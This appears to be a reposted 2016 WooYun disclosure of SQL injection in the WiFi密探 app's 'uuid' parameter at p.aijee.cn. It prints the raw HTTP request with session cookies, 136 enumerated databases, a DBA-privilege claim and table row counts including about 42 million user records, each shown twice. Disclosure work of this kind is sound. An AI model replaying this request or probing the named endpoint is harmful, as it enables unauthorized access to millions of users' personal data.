WIFI安全之wifi密探客户端存在注入导致千万用户泄露/130多个城市/DBA权限

admin
admin
admin
139541
文章
114
评论
2017年4月21日05:07:49评论429 views字数 231阅读0分46秒阅读模式
摘要

2016-04-20: 细节已通知厂商并且等待厂商处理中
2016-04-22: 厂商已经确认,细节仅向厂商公开
2016-05-02: 细节向核心白帽子及相关领域专家公开
2016-05-12: 细节向普通白帽子公开
2016-05-22: 细节向实习白帽子公开
2016-06-06: 细节向公众公开

漏洞概要 关注数(14) 关注此漏洞

缺陷编号: WooYun-2016-196990

漏洞标题: WIFI安全之wifi密探客户端存在注入导致千万用户泄露/130多个城市/DBA权限

相关厂商: aijee.cn

漏洞作者: 头晕脑壳疼

提交时间: 2016-04-20 13:15

公开时间: 2016-06-06 11:10

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 无

2人收藏

漏洞详情

披露状态:

2016-04-20: 细节已通知厂商并且等待厂商处理中
2016-04-22: 厂商已经确认,细节仅向厂商公开
2016-05-02: 细节向核心白帽子及相关领域专家公开
2016-05-12: 细节向普通白帽子公开
2016-05-22: 细节向实习白帽子公开
2016-06-06: 细节向公众公开

简要描述:

菜鸟挖洞洞不容易,有木有小礼品奖励下

详细说明:

code 区域 
POST /CApp1_3_5/checkNet HTTP/1.1
 Content-Length: 69
 Content-Type: application/x-www-form-urlencoded
 Host: p.aijee.cn
 Connection: close
 User-Agent: android-async-http/1.4.3 (http://loopj.com/android-async-http)
 Cookie: PHPSESSID=uvg31p37bbo23i6ms65fldlln6; SERVERID=6f41b44ea2ad9c8fbb722f6e285fd6ba|1460777940|1460777940
 Cookie2: $Version=1
 Accept-Encoding: gzip
 
 uuid=48600807e2a4486898dd658d48073629&mac=08%3A00%3A27%3A25%3A83%3A6a

参数uuid存在注入

WIFI安全之wifi密探客户端存在注入导致千万用户泄露/130多个城市/DBA权限

code 区域 
available databases [136]:
 [*] asbeta
 [*] authserver
 [*] information_schema
 [*] mysql
 [*] rdsh
 [*] rdsh2
 [*] rdsh2bak
 [*] rdsh_akesudiqu
 [*] rdsh_aletaidiqu
 [*] rdsh_anshan
 [*] rdsh_baicheng
 [*] rdsh_baishan
 [*] rdsh_baiyin
 [*] rdsh_baoding
 [*] rdsh_baotou
 [*] rdsh_bayannaoer
 [*] rdsh_beijing
 [*] rdsh_benxi
 [*] rdsh_binzhou
 [*] rdsh_cangzhou
 [*] rdsh_changchun
 [*] rdsh_changzhi
 [*] rdsh_chaoyang
 [*] rdsh_chengde
 [*] rdsh_chifeng
 [*] rdsh_chongzuo
 [*] rdsh_dalian
 [*] rdsh_dandong
 [*] rdsh_daqing
 [*] rdsh_datong
 [*] rdsh_dezhou
 [*] rdsh_dingxi
 [*] rdsh_dongying
 [*] rdsh_fangchenggang
 [*] rdsh_fushun
 [*] rdsh_fuxin
 [*] rdsh_guigang
 [*] rdsh_guilin
 [*] rdsh_guyuan
 [*] rdsh_haerbin
 [*] rdsh_hamidiqu
 [*] rdsh_handan
 [*] rdsh_hegang
 [*] rdsh_heihe
 [*] rdsh_hengshui
 [*] rdsh_hetiandiqu
 [*] rdsh_heze
 [*] rdsh_hezhou
 [*] rdsh_huhehaote
 [*] rdsh_huludao
 [*] rdsh_hulunbeier
 [*] rdsh_jiamusi
 [*] rdsh_jiayuguan
 [*] rdsh_jilin
 [*] rdsh_jinan
 [*] rdsh_jinchang
 [*] rdsh_jincheng
 [*] rdsh_jining
 [*] rdsh_jinzhong
 [*] rdsh_jinzhou
 [*] rdsh_jiuquan
 [*] rdsh_jixi
 [*] rdsh_kashidiqu
 [*] rdsh_kelamayi
 [*] rdsh_laibin
 [*] rdsh_laiwu
 [*] rdsh_langfang
 [*] rdsh_lanzhou
 [*] rdsh_liaocheng
 [*] rdsh_liaoyang
 [*] rdsh_liaoyuan
 [*] rdsh_linfen
 [*] rdsh_linyi
 [*] rdsh_log
 [*] rdsh_longnan
 [*] rdsh_lvliang
 [*] rdsh_mudanjiang
 [*] rdsh_panjin
 [*] rdsh_pay
 [*] rdsh_pingliang
 [*] rdsh_putian
 [*] rdsh_qingdao
 [*] rdsh_qingyang
 [*] rdsh_qinhuangdao
 [*] rdsh_qinzhou
 [*] rdsh_qiqihaer
 [*] rdsh_qitaihe
 [*] rdsh_rizhao
 [*] rdsh_sanming
 [*] rdsh_shenyang
 [*] rdsh_shijiazhuang
 [*] rdsh_shizuishan
 [*] rdsh_shuangyashan
 [*] rdsh_shuozhou
 [*] rdsh_siping
 [*] rdsh_songyuan
 [*] rdsh_suihua
 [*] rdsh_tachengdiqu
 [*] rdsh_taian
 [*] rdsh_taiyuan
 [*] rdsh_tangshan
 [*] rdsh_tianjin
 [*] rdsh_tianshui
 [*] rdsh_tieling
 [*] rdsh_tonghua
 [*] rdsh_tongliao
 [*] rdsh_tulufandiqu
 [*] rdsh_weifang
 [*] rdsh_weihai
 [*] rdsh_wuhai
 [*] rdsh_wulanchabu
 [*] rdsh_wulumuqi
 [*] rdsh_wuwei
 [*] rdsh_wuzhong
 [*] rdsh_wuzhou
 [*] rdsh_xinganmeng
 [*] rdsh_xingtai
 [*] rdsh_xining
 [*] rdsh_xinzhou
 [*] rdsh_yangquan
 [*] rdsh_yantai
 [*] rdsh_yichun
 [*] rdsh_yinchuan
 [*] rdsh_yingkou
 [*] rdsh_yulin
 [*] rdsh_yuncheng
 [*] rdsh_zaozhuang
 [*] rdsh_zhangjiakou
 [*] rdsh_zhangye
 [*] rdsh_zhongwei
 [*] rdsh_zhou
 [*] rdsh_zibo
 [*] rdshbak
 [*] rdshtest
 [*] root
 [*] test

DBA权限

WIFI安全之wifi密探客户端存在注入导致千万用户泄露/130多个城市/DBA权限

有两个user的表

千万用户

code 区域 
+-----------------------------------+---------+
 | Table                             | Entries |
 +-----------------------------------+---------+
 | rdsh_wm_user                      | 42644005 |
 | rdsh_push_log_postion             | 6425031 |
 | rdsh_coupon_mt_role               | 4777601 |
 | rdsh_app_count                    | 3783171 |
 | rdsh_coupon_mt                    | 2081793 |
 | rdsh_wm_router                    | 1980000 |
 | rdsh_wm_business_day              | 1848251 |
 | rdsh_wm_business                  | 1811110 |
 | rdsh_router_warning               | 1274784 |
 | rdsh_coupon_nm_shop               | 1157876 |
 | rdsh_portallog                    | 1023002 |
 | rdsh_user                         | 860361  |
 | rdsh_coupon_mt_shop               | 836490  |
 | rdsh_coupon_nm_shop_bak           | 640520  |
 | rdsh_push_current_postion         | 614973  |
 | rdsh_smsinterfacelog              | 559888  |
 | rdsh_wifi_speed_log               | 519264  |
 | rdsh_imagelib                     | 428069  |
 | rdsh_business_dp                  | 384370  |
 | rdsh_business_status              | 384370  |
 | rdsh_deal_business                | 378170  |
 | rdsh_deal_image_more              | 373569  |
 | rdsh_coupon_nm_role_bak           | 341461  |
 | rdsh_deal                         | 292367  |
 | rdsh_coupon_nm_role               | 262659  |
 | rdsh_business1                    | 248561  |
 | rdsh_image                        | 247861  |
 | applog                            | 239581  |
 | rdsh_coupon_nm                    | 239514  |
 | rdsh_deal_restriction             | 239200  |
 | rdsh_wificonf                     | 221395  |
 | rdsh_business_fans                | 206737  |
 | rdsh_coupon_nm_role_his           | 190375  |
 | rdsh_wifi_android_log             | 183767  |
 | rdsh_special_subject_log          | 168739  |
 | rdsh_sign                         | 142881  |
 | rdsh_fans_count                   | 135971  |
 | rdsh_wx_unionid                   | 127687  |
 | tomato_report_log                 | 126725  |
 | rdsh_business_wifi                | 123853  |
 | rdsh_coupon_nm_bak                | 119984  |
 | rdsh_setting                      | 107414  |
 | rdsh_business_account             | 106680  |
 | rdsh_slide_business               | 105832  |
 | rdsh_merchant                     | 102423  |
 | rdsh_business                     | 101440  |
 | rdsh_push_log                     | 90398   |
 | rdsh_ad_capp_home_log             | 88939   |
 | rdsh_agent_business               | 80773   |
 | rdsh_wifiscanlog                  | 78198   |
 | rdsh_ce                           | 75011   |
 | rdsh_coupon_count                 | 66450   |
 | rdsh_send_push_log                | 65507   |
 | rdsh_business_wifi_audit_user     | 60664   |
 | rdsh_business_qrlog               | 60012   |
 | rdsh_business_coupon_fans         | 50462   |
 | rdsh_tongji                       | 44382   |
 | rdsh_day_static                   | 37999   |
 | rdsh_business_fans_dd_count       | 35808   |
 | rdsh_mall_business                | 30854   |
 | rdsh_coupon_mt_role_his           | 30314   |
 | rdsh_accounttable                 | 22626   |
 | rdsh_business_dp_goods            | 22574   |
 | rdsh_business_static              | 22521   |
 | rdsh_accountrel                   | 21422   |
 | rdsh_accountlog                   | 17583   |
 | rdsh_goods_img                    | 15506   |
 | rdsh_goodsprice                   | 15377   |
 | rdsh_goods                        | 15259   |
 | rdsh_classes_goods_business       | 15030   |
 | rdsh_business_wifi_shield         | 11981   |
 | rdsh_business_dp_img              | 11287   |
 | rdsh_business_instore_promotion   | 11157   |
 | rdsh_coupon_mt_his                | 10000   |
 | rdsh_coupon_nm_his                | 10000   |
 | rdsh_business_wifi_pwd_error      | 7497    |
 | rdsh_onlinebill                   | 7399    |
 | rdsh_business_cloudstore_realname | 7236    |
 | rdsh_goods_show                   | 6495    |
 | rdsh_neighborhood                 | 6064    |
 | rdsh_channel                      | 5808    |
 | rdsh_business_coupon              | 5154    |
 | rdsh_user_wxqrcode                | 4559    |
 | rdsh_business_wifi_copy4          | 4554    |
 | rdsh_classes                      | 4338    |
 | rdsh_user2                        | 4319    |
 | rdsh_column_business              | 4182    |
 | rdsh_user_sharepoint              | 4180    |
 | rdsh_goods_browse_log             | 4000    |
 | rdsh_dp_count                     | 3516    |
 | rdsh_district1                    | 3446    |
 | rdsh_business_shorturl            | 3187    |
 | rdsh_trace_log                    | 3141    |
 | rdsh_district                     | 3092    |
 | rdsh_userfeedback                 | 2931    |
 | rdsh_business_wifi_audit          | 2910    |
 | rdsh_business_guest               | 2876    |
 | rdsh_promotion_partake            | 2699    |
 | rdsh_business_service             | 2674    |
 | rdsh_promotion_collect            | 2652    |
 | rdsh_sms                          | 2434    |
 | rdsh_contract                     | 2287    |
 | rdsh_image_txt_business           | 1889    |
 | rdsh_trade_static                 | 1848    |
 | rdsh_special_subject_products     | 1827    |
 | rdsh_app_version                  | 1803    |
 | rdsh_tm_goods                     | 1627    |
 | rdsh_router                       | 1574    |
 | rdsh_business_giftresult          | 1545    |
 | rdsh_visit_business               | 1218    |
 | rdsh_review                       | 1164    |
 | rdsh_ordertreatlog                | 1085    |
 | rdsh_business_vip                 | 1050    |
 | rdsh_call_business                | 973     |
 | rdsh_business_nearpush            | 896     |
 | rdsh_download_app                 | 896     |
 | rdshb_contract                    | 841     |
 | rdsh_business_offer               | 805     |
 | rdsh_agent_users                  | 779     |
 | rdsh_platuser_role                | 762     |
 | rdsh_bankcard_bin                 | 725     |
 | rdsh_ibeacon                      | 681     |
 | rdsh_orderitems                   | 647     |
 | rdsh_goodsdaystatic               | 642     |
 | rdsh_wxshake                      | 604     |
 | rdsh_category_b                   | 598     |
 | rdsh_dt_count                     | 505     |
 | rdsh_plat_user                    | 490     |
 | rdsh_portal_count                 | 479     |
 | rdsh_device_count                 | 477     |
 | rdsh_review_business              | 440     |
 | rdsh_business_cloudstore          | 426     |
 | rdsh_aijee_area                   | 424     |
 | rdsh_business_black_white_mac     | 423     |
 | rdsh_business_fans_privilege      | 405     |
 | rdsh_citys_yd                     | 387     |
 | rdsh_system_message               | 386     |
 | rdsh_system_message_status        | 386     |
 | rdsh_service_business             | 380     |
 | rdsh_platform_order               | 372     |
 | rdsh_city                         | 360     |
 | rdsh_ordertable                   | 359     |
 | tomato_report                     | 337     |
 | rdsh_server_finance_status        | 334     |
 | rdsh_orderpost                    | 307     |
 | rdsh_wxshake_url                  | 282     |
 | rdsh_business_opener_sub          | 279     |
 | rdsh_category_mx                  | 278     |
 | rdsh_business_opener              | 267     |
 | rdsh_special_subject              | 256     |
 | rdsh_business_fav                 | 255     |
 | rdsh_stat_day_activity_register   | 255     |
 | rdsh_stat_day_au                  | 255     |
 | rdsh_stat_day_retention_rate      | 255     |
 | rdsh_stat_day_start_up_time_used  | 255     |
 | rdsh_transaction_pay_log          | 253     |
 | rdsh_work_order                   | 250     |
 | rdsh_business_msg                 | 221     |
 | rdsh_special_subject_comment      | 200     |
 | rdsh_router_cancellog             | 197     |
 | rdsh_reviews_business             | 185     |
 | rdsh_user_habit                   | 185     |
 | rdsh_cash_apply                   | 145     |
 | rdsh_promotion_comment            | 138     |
 | rdsh_cash_job                     | 119     |
 | rdsh_offlinepos                   | 114     |
 | rdsh_business_wifi_bak            | 111     |
 | rdsh_joinus_apply                 | 110     |
 | rdsh_paper_withdraw               | 107     |
 | rdsh_promotion                    | 107     |
 | rdsh_agent                        | 106     |
 | rdsh_feedback                     | 101     |
 | rdsh_receive_gift                 | 95      |
 | rdsh_shopping_cart                | 92      |
 | rdsh_business_bank                | 90      |
 | `temporary`                       | 88      |
 | rdsh_member_address               | 87      |
 | rdsh_goodsold                     | 86      |
 | rdsh_business_bank_list           | 82      |
 | rdsh_wifi_business_auto           | 81      |
 | rdsh_voucher                      | 66      |
 | rdsh_special_subject_praise       | 52      |
 | rdsh_buy_agent_goods              | 48      |
 | rdsh_category_c                   | 42      |
 | rdsh_crontab                      | 38      |
 | rdsh_log_ceshi                    | 38      |
 | rdsh_router_conf                  | 37      |
 | rdsh_stat_week_au                 | 37      |
 | rdsh_stat_week_retention_rate     | 37      |
 | rdsh_app_ad                       | 35      |
 | rdsh_coupon_business              | 35      |
 | rdsh_province                     | 35      |
 | rdsh_discount_info                | 32      |
 | rdsh_slide                        | 29      |
 | rdsh_column                       | 26      |
 | rdsh_jd_goods                     | 26      |
 | rdsh_wechat_menu                  | 26      |
 | rdsh_user_card                    | 24      |
 | rdsh_voucher_user                 | 22      |
 | rdsh_business_review              | 21      |
 | rdsh_aijee_msg                    | 20      |
 | rdsh_platrole                     | 16      |
 | rdsh_wifiscan                     | 14      |
 | rdsh_pad                          | 13      |
 | rdsh_category_a                   | 12      |
 | rdsh_paper                        | 11      |
 | rdsh_report                       | 10      |
 | rdsh_business_contacts            | 9       |
 | rdsh_ordercomplaint_img           | 9       |
 | rdsh_stat_month_au                | 9       |
 | rdsh_wechat_word                  | 9       |
 | rdsh_business_ddsms               | 8       |
 | rdsh_stat_month_retention_rate    | 8       |
 | rdsh_vocational_img               | 8       |
 | rdsh_wechat_sub                   | 7       |
 | rdsh_business_weixin_account      | 6       |
 | rdsh_image_txt                    | 6       |
 | rdsh_wechat_def                   | 6       |
 | rdsh_gift                         | 5       |
 | rdsh_paper_probability            | 5       |
 | rdsh_sms_interface                | 5       |
 | rdsh_wechat_img                   | 5       |
 | rdsh_message_moban                | 4       |
 | rdsh_ordercomplaint               | 4       |
 | rdsh_smsjoblog                    | 4       |
 | rdsh_voucher_moban                | 4       |
 | rdsh_acctool                      | 3       |
 | rdsh_agent_user                   | 3       |
 | rdsh_business_area_voucher        | 3       |
 | rdsh_business_role                | 3       |
 | rdsh_cam                          | 3       |
 | rdsh_userfeedbackreply            | 3       |
 | rdsh_business_msg_rules           | 2       |
 | rdsh_userfeedbackreply_moban      | 2       |
 | rdsh_agent_role                   | 1       |
 | rdsh_app_ad_customer              | 1       |
 | rdsh_business_coupon_push         | 1       |
 | rdsh_business_scene               | 1       |
 | rdsh_paper_set                    | 1       |
 | rdsh_pos                          | 1       |
 | rdsh_sys_conf                     | 1       |
 +-----------------------------------+---------+

漏洞证明:

code 区域 
POST /CApp1_3_5/checkNet HTTP/1.1
 Content-Length: 69
 Content-Type: application/x-www-form-urlencoded
 Host: p.aijee.cn
 Connection: close
 User-Agent: android-async-http/1.4.3 (http://loopj.com/android-async-http)
 Cookie: PHPSESSID=uvg31p37bbo23i6ms65fldlln6; SERVERID=6f41b44ea2ad9c8fbb722f6e285fd6ba|1460777940|1460777940
 Cookie2: $Version=1
 Accept-Encoding: gzip
 
 uuid=48600807e2a4486898dd658d48073629&mac=08%3A00%3A27%3A25%3A83%3A6a

参数uuid存在注入

WIFI安全之wifi密探客户端存在注入导致千万用户泄露/130多个城市/DBA权限

code 区域 
available databases [136]:
 [*] asbeta
 [*] authserver
 [*] information_schema
 [*] mysql
 [*] rdsh
 [*] rdsh2
 [*] rdsh2bak
 [*] rdsh_akesudiqu
 [*] rdsh_aletaidiqu
 [*] rdsh_anshan
 [*] rdsh_baicheng
 [*] rdsh_baishan
 [*] rdsh_baiyin
 [*] rdsh_baoding
 [*] rdsh_baotou
 [*] rdsh_bayannaoer
 [*] rdsh_beijing
 [*] rdsh_benxi
 [*] rdsh_binzhou
 [*] rdsh_cangzhou
 [*] rdsh_changchun
 [*] rdsh_changzhi
 [*] rdsh_chaoyang
 [*] rdsh_chengde
 [*] rdsh_chifeng
 [*] rdsh_chongzuo
 [*] rdsh_dalian
 [*] rdsh_dandong
 [*] rdsh_daqing
 [*] rdsh_datong
 [*] rdsh_dezhou
 [*] rdsh_dingxi
 [*] rdsh_dongying
 [*] rdsh_fangchenggang
 [*] rdsh_fushun
 [*] rdsh_fuxin
 [*] rdsh_guigang
 [*] rdsh_guilin
 [*] rdsh_guyuan
 [*] rdsh_haerbin
 [*] rdsh_hamidiqu
 [*] rdsh_handan
 [*] rdsh_hegang
 [*] rdsh_heihe
 [*] rdsh_hengshui
 [*] rdsh_hetiandiqu
 [*] rdsh_heze
 [*] rdsh_hezhou
 [*] rdsh_huhehaote
 [*] rdsh_huludao
 [*] rdsh_hulunbeier
 [*] rdsh_jiamusi
 [*] rdsh_jiayuguan
 [*] rdsh_jilin
 [*] rdsh_jinan
 [*] rdsh_jinchang
 [*] rdsh_jincheng
 [*] rdsh_jining
 [*] rdsh_jinzhong
 [*] rdsh_jinzhou
 [*] rdsh_jiuquan
 [*] rdsh_jixi
 [*] rdsh_kashidiqu
 [*] rdsh_kelamayi
 [*] rdsh_laibin
 [*] rdsh_laiwu
 [*] rdsh_langfang
 [*] rdsh_lanzhou
 [*] rdsh_liaocheng
 [*] rdsh_liaoyang
 [*] rdsh_liaoyuan
 [*] rdsh_linfen
 [*] rdsh_linyi
 [*] rdsh_log
 [*] rdsh_longnan
 [*] rdsh_lvliang
 [*] rdsh_mudanjiang
 [*] rdsh_panjin
 [*] rdsh_pay
 [*] rdsh_pingliang
 [*] rdsh_putian
 [*] rdsh_qingdao
 [*] rdsh_qingyang
 [*] rdsh_qinhuangdao
 [*] rdsh_qinzhou
 [*] rdsh_qiqihaer
 [*] rdsh_qitaihe
 [*] rdsh_rizhao
 [*] rdsh_sanming
 [*] rdsh_shenyang
 [*] rdsh_shijiazhuang
 [*] rdsh_shizuishan
 [*] rdsh_shuangyashan
 [*] rdsh_shuozhou
 [*] rdsh_siping
 [*] rdsh_songyuan
 [*] rdsh_suihua
 [*] rdsh_tachengdiqu
 [*] rdsh_taian
 [*] rdsh_taiyuan
 [*] rdsh_tangshan
 [*] rdsh_tianjin
 [*] rdsh_tianshui
 [*] rdsh_tieling
 [*] rdsh_tonghua
 [*] rdsh_tongliao
 [*] rdsh_tulufandiqu
 [*] rdsh_weifang
 [*] rdsh_weihai
 [*] rdsh_wuhai
 [*] rdsh_wulanchabu
 [*] rdsh_wulumuqi
 [*] rdsh_wuwei
 [*] rdsh_wuzhong
 [*] rdsh_wuzhou
 [*] rdsh_xinganmeng
 [*] rdsh_xingtai
 [*] rdsh_xining
 [*] rdsh_xinzhou
 [*] rdsh_yangquan
 [*] rdsh_yantai
 [*] rdsh_yichun
 [*] rdsh_yinchuan
 [*] rdsh_yingkou
 [*] rdsh_yulin
 [*] rdsh_yuncheng
 [*] rdsh_zaozhuang
 [*] rdsh_zhangjiakou
 [*] rdsh_zhangye
 [*] rdsh_zhongwei
 [*] rdsh_zhou
 [*] rdsh_zibo
 [*] rdshbak
 [*] rdshtest
 [*] root
 [*] test

DBA权限

WIFI安全之wifi密探客户端存在注入导致千万用户泄露/130多个城市/DBA权限

code 区域 
+-----------------------------------+---------+
 | Table                             | Entries |
 +-----------------------------------+---------+
 | rdsh_wm_user                      | 42644005 |
 | rdsh_push_log_postion             | 6425031 |
 | rdsh_coupon_mt_role               | 4777601 |
 | rdsh_app_count                    | 3783171 |
 | rdsh_coupon_mt                    | 2081793 |
 | rdsh_wm_router                    | 1980000 |
 | rdsh_wm_business_day              | 1848251 |
 | rdsh_wm_business                  | 1811110 |
 | rdsh_router_warning               | 1274784 |
 | rdsh_coupon_nm_shop               | 1157876 |
 | rdsh_portallog                    | 1023002 |
 | rdsh_user                         | 860361  |
 | rdsh_coupon_mt_shop               | 836490  |
 | rdsh_coupon_nm_shop_bak           | 640520  |
 | rdsh_push_current_postion         | 614973  |
 | rdsh_smsinterfacelog              | 559888  |
 | rdsh_wifi_speed_log               | 519264  |
 | rdsh_imagelib                     | 428069  |
 | rdsh_business_dp                  | 384370  |
 | rdsh_business_status              | 384370  |
 | rdsh_deal_business                | 378170  |
 | rdsh_deal_image_more              | 373569  |
 | rdsh_coupon_nm_role_bak           | 341461  |
 | rdsh_deal                         | 292367  |
 | rdsh_coupon_nm_role               | 262659  |
 | rdsh_business1                    | 248561  |
 | rdsh_image                        | 247861  |
 | applog                            | 239581  |
 | rdsh_coupon_nm                    | 239514  |
 | rdsh_deal_restriction             | 239200  |
 | rdsh_wificonf                     | 221395  |
 | rdsh_business_fans                | 206737  |
 | rdsh_coupon_nm_role_his           | 190375  |
 | rdsh_wifi_android_log             | 183767  |
 | rdsh_special_subject_log          | 168739  |
 | rdsh_sign                         | 142881  |
 | rdsh_fans_count                   | 135971  |
 | rdsh_wx_unionid                   | 127687  |
 | tomato_report_log                 | 126725  |
 | rdsh_business_wifi                | 123853  |
 | rdsh_coupon_nm_bak                | 119984  |
 | rdsh_setting                      | 107414  |
 | rdsh_business_account             | 106680  |
 | rdsh_slide_business               | 105832  |
 | rdsh_merchant                     | 102423  |
 | rdsh_business                     | 101440  |
 | rdsh_push_log                     | 90398   |
 | rdsh_ad_capp_home_log             | 88939   |
 | rdsh_agent_business               | 80773   |
 | rdsh_wifiscanlog                  | 78198   |
 | rdsh_ce                           | 75011   |
 | rdsh_coupon_count                 | 66450   |
 | rdsh_send_push_log                | 65507   |
 | rdsh_business_wifi_audit_user     | 60664   |
 | rdsh_business_qrlog               | 60012   |
 | rdsh_business_coupon_fans         | 50462   |
 | rdsh_tongji                       | 44382   |
 | rdsh_day_static                   | 37999   |
 | rdsh_business_fans_dd_count       | 35808   |
 | rdsh_mall_business                | 30854   |
 | rdsh_coupon_mt_role_his           | 30314   |
 | rdsh_accounttable                 | 22626   |
 | rdsh_business_dp_goods            | 22574   |
 | rdsh_business_static              | 22521   |
 | rdsh_accountrel                   | 21422   |
 | rdsh_accountlog                   | 17583   |
 | rdsh_goods_img                    | 15506   |
 | rdsh_goodsprice                   | 15377   |
 | rdsh_goods                        | 15259   |
 | rdsh_classes_goods_business       | 15030   |
 | rdsh_business_wifi_shield         | 11981   |
 | rdsh_business_dp_img              | 11287   |
 | rdsh_business_instore_promotion   | 11157   |
 | rdsh_coupon_mt_his                | 10000   |
 | rdsh_coupon_nm_his                | 10000   |
 | rdsh_business_wifi_pwd_error      | 7497    |
 | rdsh_onlinebill                   | 7399    |
 | rdsh_business_cloudstore_realname | 7236    |
 | rdsh_goods_show                   | 6495    |
 | rdsh_neighborhood                 | 6064    |
 | rdsh_channel                      | 5808    |
 | rdsh_business_coupon              | 5154    |
 | rdsh_user_wxqrcode                | 4559    |
 | rdsh_business_wifi_copy4          | 4554    |
 | rdsh_classes                      | 4338    |
 | rdsh_user2                        | 4319    |
 | rdsh_column_business              | 4182    |
 | rdsh_user_sharepoint              | 4180    |
 | rdsh_goods_browse_log             | 4000    |
 | rdsh_dp_count                     | 3516    |
 | rdsh_district1                    | 3446    |
 | rdsh_business_shorturl            | 3187    |
 | rdsh_trace_log                    | 3141    |
 | rdsh_district                     | 3092    |
 | rdsh_userfeedback                 | 2931    |
 | rdsh_business_wifi_audit          | 2910    |
 | rdsh_business_guest               | 2876    |
 | rdsh_promotion_partake            | 2699    |
 | rdsh_business_service             | 2674    |
 | rdsh_promotion_collect            | 2652    |
 | rdsh_sms                          | 2434    |
 | rdsh_contract                     | 2287    |
 | rdsh_image_txt_business           | 1889    |
 | rdsh_trade_static                 | 1848    |
 | rdsh_special_subject_products     | 1827    |
 | rdsh_app_version                  | 1803    |
 | rdsh_tm_goods                     | 1627    |
 | rdsh_router                       | 1574    |
 | rdsh_business_giftresult          | 1545    |
 | rdsh_visit_business               | 1218    |
 | rdsh_review                       | 1164    |
 | rdsh_ordertreatlog                | 1085    |
 | rdsh_business_vip                 | 1050    |
 | rdsh_call_business                | 973     |
 | rdsh_business_nearpush            | 896     |
 | rdsh_download_app                 | 896     |
 | rdshb_contract                    | 841     |
 | rdsh_business_offer               | 805     |
 | rdsh_agent_users                  | 779     |
 | rdsh_platuser_role                | 762     |
 | rdsh_bankcard_bin                 | 725     |
 | rdsh_ibeacon                      | 681     |
 | rdsh_orderitems                   | 647     |
 | rdsh_goodsdaystatic               | 642     |
 | rdsh_wxshake                      | 604     |
 | rdsh_category_b                   | 598     |
 | rdsh_dt_count                     | 505     |
 | rdsh_plat_user                    | 490     |
 | rdsh_portal_count                 | 479     |
 | rdsh_device_count                 | 477     |
 | rdsh_review_business              | 440     |
 | rdsh_business_cloudstore          | 426     |
 | rdsh_aijee_area                   | 424     |
 | rdsh_business_black_white_mac     | 423     |
 | rdsh_business_fans_privilege      | 405     |
 | rdsh_citys_yd                     | 387     |
 | rdsh_system_message               | 386     |
 | rdsh_system_message_status        | 386     |
 | rdsh_service_business             | 380     |
 | rdsh_platform_order               | 372     |
 | rdsh_city                         | 360     |
 | rdsh_ordertable                   | 359     |
 | tomato_report                     | 337     |
 | rdsh_server_finance_status        | 334     |
 | rdsh_orderpost                    | 307     |
 | rdsh_wxshake_url                  | 282     |
 | rdsh_business_opener_sub          | 279     |
 | rdsh_category_mx                  | 278     |
 | rdsh_business_opener              | 267     |
 | rdsh_special_subject              | 256     |
 | rdsh_business_fav                 | 255     |
 | rdsh_stat_day_activity_register   | 255     |
 | rdsh_stat_day_au                  | 255     |
 | rdsh_stat_day_retention_rate      | 255     |
 | rdsh_stat_day_start_up_time_used  | 255     |
 | rdsh_transaction_pay_log          | 253     |
 | rdsh_work_order                   | 250     |
 | rdsh_business_msg                 | 221     |
 | rdsh_special_subject_comment      | 200     |
 | rdsh_router_cancellog             | 197     |
 | rdsh_reviews_business             | 185     |
 | rdsh_user_habit                   | 185     |
 | rdsh_cash_apply                   | 145     |
 | rdsh_promotion_comment            | 138     |
 | rdsh_cash_job                     | 119     |
 | rdsh_offlinepos                   | 114     |
 | rdsh_business_wifi_bak            | 111     |
 | rdsh_joinus_apply                 | 110     |
 | rdsh_paper_withdraw               | 107     |
 | rdsh_promotion                    | 107     |
 | rdsh_agent                        | 106     |
 | rdsh_feedback                     | 101     |
 | rdsh_receive_gift                 | 95      |
 | rdsh_shopping_cart                | 92      |
 | rdsh_business_bank                | 90      |
 | `temporary`                       | 88      |
 | rdsh_member_address               | 87      |
 | rdsh_goodsold                     | 86      |
 | rdsh_business_bank_list           | 82      |
 | rdsh_wifi_business_auto           | 81      |
 | rdsh_voucher                      | 66      |
 | rdsh_special_subject_praise       | 52      |
 | rdsh_buy_agent_goods              | 48      |
 | rdsh_category_c                   | 42      |
 | rdsh_crontab                      | 38      |
 | rdsh_log_ceshi                    | 38      |
 | rdsh_router_conf                  | 37      |
 | rdsh_stat_week_au                 | 37      |
 | rdsh_stat_week_retention_rate     | 37      |
 | rdsh_app_ad                       | 35      |
 | rdsh_coupon_business              | 35      |
 | rdsh_province                     | 35      |
 | rdsh_discount_info                | 32      |
 | rdsh_slide                        | 29      |
 | rdsh_column                       | 26      |
 | rdsh_jd_goods                     | 26      |
 | rdsh_wechat_menu                  | 26      |
 | rdsh_user_card                    | 24      |
 | rdsh_voucher_user                 | 22      |
 | rdsh_business_review              | 21      |
 | rdsh_aijee_msg                    | 20      |
 | rdsh_platrole                     | 16      |
 | rdsh_wifiscan                     | 14      |
 | rdsh_pad                          | 13      |
 | rdsh_category_a                   | 12      |
 | rdsh_paper                        | 11      |
 | rdsh_report                       | 10      |
 | rdsh_business_contacts            | 9       |
 | rdsh_ordercomplaint_img           | 9       |
 | rdsh_stat_month_au                | 9       |
 | rdsh_wechat_word                  | 9       |
 | rdsh_business_ddsms               | 8       |
 | rdsh_stat_month_retention_rate    | 8       |
 | rdsh_vocational_img               | 8       |
 | rdsh_wechat_sub                   | 7       |
 | rdsh_business_weixin_account      | 6       |
 | rdsh_image_txt                    | 6       |
 | rdsh_wechat_def                   | 6       |
 | rdsh_gift                         | 5       |
 | rdsh_paper_probability            | 5       |
 | rdsh_sms_interface                | 5       |
 | rdsh_wechat_img                   | 5       |
 | rdsh_message_moban                | 4       |
 | rdsh_ordercomplaint               | 4       |
 | rdsh_smsjoblog                    | 4       |
 | rdsh_voucher_moban                | 4       |
 | rdsh_acctool                      | 3       |
 | rdsh_agent_user                   | 3       |
 | rdsh_business_area_voucher        | 3       |
 | rdsh_business_role                | 3       |
 | rdsh_cam                          | 3       |
 | rdsh_userfeedbackreply            | 3       |
 | rdsh_business_msg_rules           | 2       |
 | rdsh_userfeedbackreply_moban      | 2       |
 | rdsh_agent_role                   | 1       |
 | rdsh_app_ad_customer              | 1       |
 | rdsh_business_coupon_push         | 1       |
 | rdsh_business_scene               | 1       |
 | rdsh_paper_set                    | 1       |
 | rdsh_pos                          | 1       |
 | rdsh_sys_conf                     | 1       |
 +-----------------------------------+---------+

修复方案:

版权声明:转载请注明来源 头晕脑壳疼@乌云

漏洞回应

厂商回应:

危害等级:高

